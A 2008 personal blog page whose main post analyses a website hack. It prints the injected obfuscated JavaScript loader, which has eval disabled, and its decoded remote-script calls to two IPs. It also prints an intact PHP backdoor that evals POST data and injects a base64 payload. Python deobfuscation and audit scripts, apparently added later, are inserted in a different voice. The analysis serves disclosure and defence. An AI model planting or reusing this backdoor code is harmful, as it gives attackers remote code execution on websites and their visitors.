Thursday, December 18, 2008

Hacked... again....



Hackers claiming to be Muslims from Turkey hacked the site the other day, so I've just spent the evening reloading most of the files from backup. Although only a couple of files were visibly changed, almost every HTML file and random PHP files had code inserted which caused any number of unknown activities.

What I don't understand is that if you are going to go to the trouble of hacking a site and then stealthily insert code which obviously does some sort of action of benefit to the perpetrator, why would you write your name on the index page as a red flag to say this site has been hacked? Surely if I were a hacker I would just insert the code quietly and then nobody would know it was there unless they did a full site compare. Unless you wanted a site to look like it had been hacked by someone else..... hmmmm

Anyway, I'm off to review my file permissions and PHP code across the site... and sift through some log files ;)

[EDIT:] Here is the JavaScript code that was patched into all my webpages. I have renamed the 'eval' function to disable the action and broken it into lines.

if(typeof(yahoo_counter)!=typeof(1))evalDISABLED(unescape('%2F%2F%3Cdi%76#%20!%73|%74%79%6C%65%3D$
%64%69~%73`%70l@%61y`%3A`n$%6F`%6E|e%3E\n#do#%63$%75!%6D%65$%6E|%74`%2E%77#%72i@%74%65%28$%22%3C
%2F%74|%65%78%74a#%72e&a|%3E")%3B%76`%61@r%20i|%2C%5F|%2C%61@%3D%5B#%2278|.|1&%310%2E@17@5`%2E&%321
!%22~,%2219!%35~.&2#4~.%37!6`.2#%35!1"@%5D~;_%3D%31~%3Bi@f$%28%64&%6F%63&%75&%6D%65n&t.c&%6F#ok%69
%65.%6D`a%74#c`%68~(%2F%5C$%62#hg#%66%74%3D#1/&%29=~%3D%6E#u@%6C`l%29!f%6Fr&%28$%69&=|%30%3B#
%69#%3C%32%3B!i|%2B!+#%29doc&%75%6D#%65&%6Et%2Ew&%72%69!t#e@(#"!%3C%73|cr#i%70t%3E`%69!%66~(#_%29$
%64@%6Fcu~%6D@e%6E|t%2E%77`rit%65%28%5C%22!%3C#%73%63%72!ip&t%20~id=%5F&"%2Bi!+"_`%20s`%72c=//%22~
+`%61@%5B$%69%5D`+#%22#/%63`%70$%2F%3F&%22&%2B@n$%61%76$%69%67`%61%74!%6F`r#%2Eap!%70#%4E`%61!
m&e!.&%63&h`%61!rA%74!(0`)@%2B"%3E%3C~%5C%5C%2F!%73%63r!%69%70!t!%3E#%5C"&)~%3C%5C/s`%63ri%70%74%3E$
%22%29@;\n%2F@/&%3C%2F%64|%69%76#%3E').replace(/#|\!|@|~|`|\&|\$|\|/g,""));var yahoo_counter=1;


The un-obfuscated version is as follows:

//<div style=display:none>
// close any <textarea> the injection point happened to land in, so the script is parsed
document.write("</textarea>");
var i,_,a=["78.110.175.21","195.24.76.251"];
_=1;
// only load the remote scripts if the hgft=1 cookie has not been set yet
if(document.cookie.match(/\bhgft=1/)==null)
  for(i=0;i<2;i++)
    document.write("<script>if(_)document.write(\"<script id=_"+i+"_ src=//"+a[i]+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");
//</div>
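The decoding step that turns the blob above into this cleartext is just JavaScript's unescape() followed by a regex that strips a fixed set of junk characters. The following is an added example (not code from the post), reproducing that step in Python without the eval so the payload can be read safely; the names deobfuscate, extract_hosts, STAGE1_NOISE and STAGE2_NOISE are my own. STAGE1_SAMPLE is two excerpts copied from the blob above with the author's line breaks removed; STAGE2_SAMPLE is a constructed fragment that encodes the cookie assignment the second stage performs, using the second stage's noise set.

```python
import re
from urllib.parse import unquote

# Noise characters removed by each stage's .replace(/.../g, "") call, as quoted in the post.
STAGE1_NOISE = set("#!@~`&$|")   # first-stage loader injected into the HTML files
STAGE2_NOISE = set("@!~?#$`|")   # second stage fetched from /cp/?I


def deobfuscate(blob: str, noise: set) -> str:
    """Mirror eval(unescape(blob).replace(/.../g, "")) without the eval.

    unescape() runs first and the noise characters are stripped from the
    *decoded* text, so keep that order: a noise character hidden as %XX is
    removed too, whereas stripping first would leave it in place."""
    # unescape() also decodes %uXXXX; urllib's unquote() does not, so do it here
    decoded = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), blob)
    decoded = unquote(decoded, encoding="latin-1")   # one byte per %XX, like unescape()
    return "".join(ch for ch in decoded if ch not in noise)


IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_hosts(decoded: str) -> list:
    """List the hard-coded addresses the decoded loader points browsers at."""
    return sorted(set(IPV4.findall(decoded)))


# Two excerpts from the first-stage blob in the post (line breaks removed), joined.
STAGE1_SAMPLE = (
    "%2F%2F%3Cdi%76#%20!%73|%74%79%6C%65%3D$%64%69~%73`%70l@%61y`%3A`n$%6F`%6E|e%3E\n"
    "%76`%61@r%20i|%2C%5F|%2C%61@%3D%5B#%2278|.|1&%310%2E@17@5`%2E&%321!%22~,%2219!%35~.&2#4~.%37!6`.2#%35!1\"@%5D~;"
)
# Constructed: document.cookie="hgft=1" encoded with the second stage's noise set.
STAGE2_SAMPLE = "%64o@c%75!m%65~n$t%2E%63?o#o`k%69|e%3D%22hg%66t=1%22"

if __name__ == "__main__":
    stage1 = deobfuscate(STAGE1_SAMPLE, STAGE1_NOISE)
    print(stage1)
    print("hosts:", extract_hosts(stage1))
    print(deobfuscate(STAGE2_SAMPLE, STAGE2_NOISE))
```

Running it prints the `//<div style=display:none>` line and the `var i,_,a=[...]` array, lists the two addresses, and decodes the constructed second-stage fragment to `document.cookie="hgft=1"`. Because stripping happens after decoding, a blob consisting only of `%23` decodes to an empty string: the `#` it encodes is itself a noise character.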



Those two IP addresses are managed by:

person: Alexander A Solovyov
address: LIMT Group Ltd.
address: Karpinskogo 97a
address: Moscow
address: 111423
address: Russian Federation
phone: +7 342 2763167

and

person: Andy BIERLAIR
address: root eSolutions
address: 35, rue John F. Kennedy
address: L-7327 Steinsel
phone: +352 20.500
fax-no: +352 20.500.500
nic-hdl: AB99-RIPE


The PHP pages were tagged with:


if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwd
CBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5c
GVvZigxKSlldmFsKHVuZXNjYXBlKCclMkYlMkYlM0NkaSU3NiMlMjAhJTczfCU3NCU3OSU2QyU2NSUzRCQlNjQlNjl+JTczYCU3MGxAJ
TYxeWAlM0FgbiQlNkZgJTZFfGUlM0VcbiNkbyMlNjMkJTc1ISU2RCU2NSQlNkV8JTc0YCUyRSU3NyMlNzJpQCU3NCU2NSUyOCQlMjIl
M0MlMkYlNzR8JTY1JTc4JTc0YSMlNzJlJmF8JTNFIiklM0IlNzZgJTYxQHIlMjBpfCUyQyU1RnwlMkMlNjFAJTNEJTVCIyUyMjc4fC58MSYlM
zEwJTJFQDE3QDVgJTJFJiUzMjEhJTIyfiwlMjIxOSElMzV+LiYyIzR+LiUzNyE2YC4yIyUzNSExIkAlNUR+O18lM0QlMzF+JTNCaUBmJCUyO
CU2NCYlNkYlNjMmJTc1JiU2RCU2NW4mdC5jJiU2RiNvayU2OSU2NS4lNkRgYSU3NCNjYCU2OH4oJTJGJTVDJCU2MiNoZyMlNjYlNzQl
M0QjMS8mJTI5PX4lM0QlNkUjdUAlNkNgbCUyOSFmJTZGciYlMjgkJTY5Jj18JTMwJTNCIyU2OSMlM0MlMzIlM0IhaXwlMkIhKyMlMjlkb2
MmJTc1JTZEIyU2NSYlNkV0JTJFdyYlNzIlNjkhdCNlQCgjIiElM0MlNzN8Y3IjaSU3MHQlM0VgJTY5ISU2Nn4oI18lMjkkJTY0QCU2RmN1fi
U2REBlJTZFfHQlMkUlNzdgcml0JTY1JTI4JTVDJTIyISUzQyMlNzMlNjMlNzIhaXAmdCUyMH5pZD0lNUYmIiUyQmkhKyJfYCUyMHNgJTc
yYz0vLyUyMn4rYCU2MUAlNUIkJTY5JTVEYCsjJTIyIy8lNjNgJTcwJCUyRiUzRiYlMjImJTJCQG4kJTYxJTc2JCU2OSU2N2AlNjElNzQhJTZG
YHIjJTJFYXAhJTcwIyU0RWAlNjEhbSZlIS4mJTYzJmhgJTYxIXJBJTc0ISgwYClAJTJCIiUzRSUzQ34lNUMlNUMlMkYhJTczJTYzciElNjklNzAh
dCElM0UjJTVDIiYpfiUzQyU1Qy9zYCU2M3JpJTcwJTc0JTNFJCUyMiUyOUA7XG4lMkZALyYlM0MlMkYlNjR8JTY5JTc2IyUzRScpLnJlcGx
hY2UoLyN8XCF8QHx+fGB8XCZ8XCR8XHwvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY
3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();


That whole base64-encoded thing boils down to the same JavaScript seen above. I have emailed the ISP managers for the IP addresses pointed at by the code and they can investigate further should they wish.
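The "full site compare" mentioned earlier, plus a check for the markers visible in the injected HTML and PHP above, is the quickest way to find every tagged file. This is an added example rather than anything from the post: it hashes a live web root against its backup, reports changed and added files, and scans them for the strings the injection left behind (yahoo_counter, tmp_lkojfghx, TMP_XHGFJOKL, the eval of $_POST, the probe for /tmp/m* files) plus a generic eval(unescape('%..')) pattern. The function names are my own, and build_demo constructs a tiny sample site in a temporary directory so the script runs offline; the tampered sample files are shortened copies of the snippets quoted in this post.

```python
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Markers lifted from the injected code quoted in this post.
INDICATORS = {
    "yahoo_counter loader": re.compile(r"yahoo_counter|Yahoo! Counter starts"),
    "tmp_lkojfghx hook": re.compile(r"tmp_lkojfghx|TMP_XHGFJOKL"),
    "eval of POST data": re.compile(r"eval\s*\(\s*\$_POST\b"),
    "probe for /tmp/m* dropper": re.compile(r"is_file\s*\([^)]*['\"]/tmp/"),
}
# Generic: eval(unescape('...')) whose string is dominated by %XX escapes.
PERCENT_EVAL = re.compile(r"eval\s*\(\s*unescape\s*\(\s*['\"](?:[^'\"]*%[0-9A-Fa-f]{2}){10,}")


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root: Path) -> dict:
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    return {str(p.relative_to(root)).replace(os.sep, "/"): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def compare_to_backup(live: Path, backup: Path) -> dict:
    """Files that differ from, are absent from, or were added since the backup."""
    live_h, back_h = tree_hashes(live), tree_hashes(backup)
    return {
        "changed": sorted(f for f in live_h if f in back_h and live_h[f] != back_h[f]),
        "added": sorted(f for f in live_h if f not in back_h),
        "missing": sorted(f for f in back_h if f not in live_h),
    }


def scan_indicators(path: Path) -> list:
    """Names of the indicators found in one file, in INDICATORS order."""
    text = path.read_text(errors="replace")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if PERCENT_EVAL.search(text):
        hits.append("percent-encoded eval blob")
    return hits


def audit(live: Path, backup: Path) -> dict:
    """Scan only the files the backup comparison flagged."""
    diff = compare_to_backup(live, backup)
    return {f: scan_indicators(live / f) for f in diff["changed"] + diff["added"]}


def build_demo() -> tuple:
    """Constructed sample: a clean backup and a live copy tampered like the post describes."""
    root = Path(tempfile.mkdtemp())
    backup, live = root / "backup", root / "live"
    files = {
        "index.html": "<html><body><p>hello</p></body></html>\n",
        "about.html": "<html><body><p>about</p></body></html>\n",
        "config.php": "<?php $db = 'localhost';\n",
    }
    for base in (backup, live):
        base.mkdir(parents=True)
        for name, body in files.items():
            (base / name).write_text(body)
    # Shortened copy of the loader from the post, inserted before </body>.
    loader = ("<script>if(typeof(yahoo_counter)!=typeof(1))eval(unescape('"
              "%2F%2F%3Cdi%76#%20!%73|%74%79%6C%65%3D$%64%69~%73`%70l@%61y`%3A`n$%6F`%6E|e%3E"
              "').replace(/#|\\!|@|~|`|\\&|\\$|\\|/g,\"\"));var yahoo_counter=1;</script>")
    (live / "index.html").write_text(files["index.html"].replace("</body>", loader + "</body>"))
    # Opening of the PHP tag from the post, prepended to a config file.
    (live / "config.php").write_text(
        "<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)"
        "if(is_file($f='/tmp/m'.$i)){include_once($f);break;}"
        "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);}\n"
        + files["config.php"])
    (live / "dropped.php").write_text("<?php echo 'new file';\n")   # not in the backup
    return live, backup


if __name__ == "__main__":
    live, backup = build_demo()
    print(compare_to_backup(live, backup))
    for name, hits in audit(live, backup).items():
        print(name, "->", hits or "no known indicators")
```

On the sample tree the comparison lists config.php and index.html as changed and dropped.php as added; the scan ties index.html to the loader and the percent-encoded eval, and config.php to the PHP hook, the $_POST eval and the /tmp probe, while dropped.php shows up only because it has no counterpart in the backup. Against a real site, point live and backup at the web root and the restored copy; files with no indicator hits still deserve a look, since the comparison, not the marker list, is the authoritative signal.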


What does the code do? Well, it goes to the two IP addresses and runs the code found at
http://78.110.175.21/cp/?I, which is currently:
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i
+"_");if(d)d.src=""}evalDISABLED(unescape('%2F/%4A`u#%73!%74%20~%66~u@c#k`%20#of`%66#.
%2E%2E`@%3C#d#%69v%20st%79%6Ce~=@d%69@%73#pl%61~y%3A~n`%6F@n%65$%3E\n~%76@ar|
%20%74@%3D%6E@%65w@ %44$a!t!e#%281#%32@29%39|7$308@30%300);%64!%6F$%63~%75me$n$
%74!.@%63o`ok|%69~e=%22h%67!%66#%74|%3D%31`;$%20#e%78@%70|%69#%72%65`s=%22#%2B
%74|%2E@t%6FG%4D%54!St$r`i`%6E`%67#(%29#+|"; %70%61|%74%68@%3D/%22@;\n%2F@%2F!
%3C/%64`iv|%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));


which de-obfuscates to:

//Just fuck off...<div style=display:none>
var t=new Date(1229972812000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//</div>


which simply sets a cookie: hgft=1, the value the first-stage loader checks for before it writes the script tags, so each browser fetches the remote code only once until the cookie expires. But I would assume that later the hacker would replace this code with something more worthwhile.

Monday, December 15, 2008

More Arduino Butterfly

David Knaack has done a great job setting up the Butteruino project over on Google Code.
You can find it at http://code.google.com/p/butteruino/

I'd hoped to get an LCD library up this weekend but got bogged down in a good book; oh well perhaps next weekend.
At least I should get some stress testing done on the butterfly logger at -37 degrees C this week due to a busted thermostat on the freezer.

Cryptonomicon and PGP Key

Just finished Neal Stephenson's CRYPTONOMICON. Great book; I like the alternative reality of Finux and things like the galvanic lucifer. Anyway, it makes me want to post my PGP key.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.8 (Darwin)

mQGiBESDrL8RBAC9J6gKjVuWrlwsMsRkHgqAVKSS/sTwyfoPrRpba7E0XctNnXhf
Vkcy9eEt8mN6MSL9haxv8U+Xlw4tSj9MEpdwVwSZT+oGD1ORN9MYnun7+7Kq8ZIj
tDEL/Xbd4L6VbqlML8gNBFE18EXYNOzHVbVFmNJkZPLRx9ldZ+YopiqUfwCg6+jt
bXn5UoLN1pE/lzW6SLhgpIUEAKVleqUC6R27ZzqyPGjmqaYUzvDyVDoldASKxHd7
IxAto1v+k9QNSDaa4iqykFStk4pBEV9KO29QVt4CyaK6rKFSvPKmQW5rI6pA45Yq
wRygfRLzqdUg/oUOny58F65urTOvdtfQtCLGxqRNS50iabwhXihRKBUQBb25hD3n
FBoOA/9+A/3w5iRRld0jnWEpqJI7JRMpMV3oT+IeHvXToWpCUF9LQEv8X012dzDU
a+uO5rOx9dwz8SZ9V02YrqYR9We+7xYe6Dp4q0r2OdhqnrEc/E4wdDxC165Br+Hg
fWwGc7Mxi5MniljSlzrw5uCutEXQ21Kly+/wUlnR1LJkRmdcZbQnTmljayBMb3R0
IChOWikgPG5pY2subG90dEBnbWFpbC5ub3NwYW0+iGAEExECACAFAkSDrL8CGwMG
CwkIBwMCBBUCCAMEFgIDAQIeAQIXgAAKCRAHV5jGyG2/QlYpAJ9G0y5cNqoiXnBD
jhmxUETZvcFwLACfQ9OUEySKcTimR+I5qTJ9D7iJGTS5Ag0ERIOuKBAIAKHeDMEO
qFgPfoSabl9BHemuOgVvZsr481DTWFYnJAH1n9qZE8hZ4MTbn/zXpIJS4ozJAyhJ
5mS/K6/3HunSvdBeMkaqVtjoCXdkTWWm9XQMeseSRffjRbNyeoroLlm3tkVRMJNh
rjN/Al1Abq3ESfZzuY8VBLGRfDPUeToNHSCLnOvD+ijMBEYsr5ds8Bi77tWAbSdR
loL3aGHIkj3fPFJmNjrAl7WZXgvl1p899tY4N19RXVkdhagcb3uVmAJjd6l7y8x3
l02jBCk3YQiRMBIG8kov+rDgZwgVaGYEitg9DxRph02sHfxEGt3fmKVLLcS1BB0M
YprObqBOwxHlx9cAAwUH/1iq+9VTh0uuKQsA+qCOthBNqsf62g0r/NJsnZoiMAvA
sLvrpwD7mzGMc+Ke7W2578IvL+Fnvmi+s67Gg2+6DAk3VkJEH9+y1CkDb8PqAxRp
sLFlvi4YcXsbXdG2UgMrfEWeIr2z0VYWGnZ3GibqUDf7rxu79ah5T8Z7ajNLEEHF
+wzXQ7vEzZVBeytL6lv+JZ5s5umRhjCy0flMZ/Js53g5IH5NMu/vrJrQTU+jREDw
+faEb3yBUaSX3N1pu88CWGdwqBVH16rt+AbHXa7kKqY46kM10QZWpHLPCzzw+jlH
c2udYs4kPyfVTSe6RG4mRD8hgx7Y/Hhnbtz5TIeH8DiISQQYEQIACQUCRIOuKAIb
DAAKCRAHV5jGyG2/Qq4zAJ0Q5asX37oT2Ih3aKiQinBdhTgqcwCgi264VRyWK1Cb
CIeQYCKAqEVp4nI=
=oFPt
-----END PGP PUBLIC KEY BLOCK-----